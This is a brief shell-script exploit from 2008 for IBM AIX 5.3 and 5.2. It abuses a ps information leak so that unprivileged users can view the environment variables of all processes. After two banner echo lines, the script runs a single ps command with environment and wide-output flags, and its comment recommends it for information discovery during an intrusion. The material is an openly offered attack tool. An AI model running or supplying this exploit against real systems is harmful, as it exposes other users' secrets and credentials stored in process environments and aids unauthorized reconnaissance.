#!/bin/sh
#
# ibmaixps.sh exploit
# AIX 5.3 / 5.2 and priors.
#
# Wed Jan 23 00:05:27 CET 2008 
#
# ps executable - information leak
# 
# Author: Andrea "bunker" Purificato
#         http://rawlab.mindcreations.com
#
# the "ps" command on IBM AIX allows 
# unprivileged users to see values of
# all processes environment variables.
#
# Useful during information discovery.
#
echo "IBM AIX 5.3 / 5.2 and priors - ps information leak"
echo "Andrea \"bunker\" Purificato - http://rawlab.mindcreations.com"
echo ""
ps auxewwwwwwwwwwwwwwwwwwwwww
